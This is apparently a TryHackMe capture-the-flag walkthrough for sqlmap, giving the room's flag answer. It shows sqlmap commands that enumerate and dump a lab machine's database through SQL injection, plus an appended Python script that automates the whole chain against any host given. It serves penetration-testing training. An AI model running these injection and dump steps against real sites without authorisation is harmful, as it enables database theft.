SQLMap — TryHackMe Walkthrough
Nov 21, 2023
What is sqlmap?
- sqlmap is an open-source penetration testing tool.
- It automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
- It contains a broad range of switches, from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Requests come in two types depending on the HTTP method: GET and POST.
1. Simple HTTP GET Based Test
sqlmap -u https://testsite.com/page.php?id=7 --dbs
Here we use two flags: -u to give the vulnerable URL and --dbs to enumerate the databases.
2. Simple HTTP POST Based Test
sqlmap -r req.txt -p blood_group --dbs
sqlmap -r <request_file> -p <vulnerable_parameter> --dbs
Note: here req.txt is the raw HTTP request saved from the intercepting proxy, in this case Burp Suite. sqlmap reads the target from the request line and Host header, so -u is not needed, and -p names the parameter to test so sqlmap does not try every one.
SQLMap Challenge
- I started by running the default Nmap scan.
- Port 80 is open, so the target serves a web page over HTTP.
- Next I ran Gobuster to look for directories and found /blood. I raised the thread count (-t 80) for faster enumeration.
Question 1 : What is the name of the interesting directory ?
Answer : blood
- Then I opened the web page at http://machine_ip/blood
- and submitted some dummy input so the request could be intercepted in Burp Suite, then saved the request to a file named request.txt for use with sqlmap.
- Then I issued the following command to find the current database user:
sqlmap -r request.txt --current-user
Question 2 : Who is the current db user?
Answer : root
- Then I listed the databases using the following command:
sqlmap -r request.txt --dbs
- Next I selected the blood database and listed its tables using the following command:
sqlmap -r request.txt -D blood --tables
- Now I can inspect each table. The second table, named flag, is the interesting one, so I listed its columns with the following command:
sqlmap -r request.txt -D blood -T flag --columns
- And dumped all the rows of the flag table using the following command:
sqlmap -r request.txt -D blood -T flag --dump
Question 3 : What is the final flag?
Answer : thm{sqlm@p_is_L0ve}
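The POST-based test above and the challenge steps both hinge on the saved request file, which the post never shows. The script below is an added example, not code from the original walkthrough or from the sqlmap project: it builds a request file in the shape Burp Suite saves, checks that the parameter named with -p really is in the body, and runs the five sqlmap invocations from the challenge in order. The machine IP 10.10.10.10, the path /blood/index.php, the form fields and the header values are assumptions standing in for whatever Burp captured on the real target; only blood_group, blood and flag come from the walkthrough.

```python
"""Added example (not from the original walkthrough): build the raw request
file that ``sqlmap -r`` reads and run the enumeration steps from the post.
The machine IP, the form path, the field values and the headers are
assumptions standing in for what Burp Suite captured on the real target."""
import shutil
import subprocess
import sys
from urllib.parse import parse_qs, urlencode

DB = "blood"           # database named in the walkthrough
TABLE = "flag"         # table named in the walkthrough
PARAM = "blood_group"  # injectable POST parameter from the walkthrough's -p switch


def build_request(host: str, path: str, params: dict) -> str:
    """Return a raw HTTP POST in the shape Burp Suite saves it ("Copy to file").

    sqlmap takes the target from the request line plus the Host header, so no
    -u is needed on the command line; the body carries the parameter for -p.
    Content-Length is computed from the encoded body so a hand-built file is
    not rejected by the server before the injection is ever evaluated.
    """
    body = urlencode(params)
    lines = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/5.0",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode())}",
        "Connection: close",
    ]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def body_params(raw_request: str) -> dict:
    """Parse the body of a saved request and return its parameters.

    Check this before passing -p: if the name is not in the body, sqlmap has
    nothing to inject into there and the scan tests the wrong parameter.
    """
    head, sep, body = raw_request.partition("\r\n\r\n")
    if not sep:  # file was saved with LF line endings instead of CRLF
        head, sep, body = raw_request.partition("\n\n")
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def enumeration_steps(request_file: str, param: str) -> list:
    """The walkthrough's sqlmap invocations, in order, as argv lists.

    --batch answers every prompt with sqlmap's default so the run is unattended.
    """
    base = ["sqlmap", "-r", request_file, "-p", param, "--batch"]
    return [
        base + ["--current-user"],
        base + ["--dbs"],
        base + ["-D", DB, "--tables"],
        base + ["-D", DB, "-T", TABLE, "--columns"],
        base + ["-D", DB, "-T", TABLE, "--dump"],
    ]


def main(host: str, request_file: str = "request.txt") -> None:
    # Assumed path and form fields; on the real box take them from Burp.
    raw = build_request(host, "/blood/index.php", {PARAM: "A+", "submit": "Search"})
    if PARAM not in body_params(raw):
        sys.exit(f"{PARAM} is not in the request body")
    with open(request_file, "w", newline="") as fh:  # newline="" keeps the CRLF endings
        fh.write(raw)
    if shutil.which("sqlmap") is None:
        sys.exit("sqlmap is not installed or not on PATH")
    for argv in enumeration_steps(request_file, PARAM):
        print("+", " ".join(argv))
        subprocess.run(argv, check=False)


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "10.10.10.10")  # assumed machine IP
```

Run it as `python3 enum.py <machine_ip>`; it writes request.txt in the current directory and then calls sqlmap five times. On a real engagement you would replace build_request with the file Burp actually saved, but body_params is still worth running against that file: a typo in the -p name is the usual reason sqlmap reports nothing injectable.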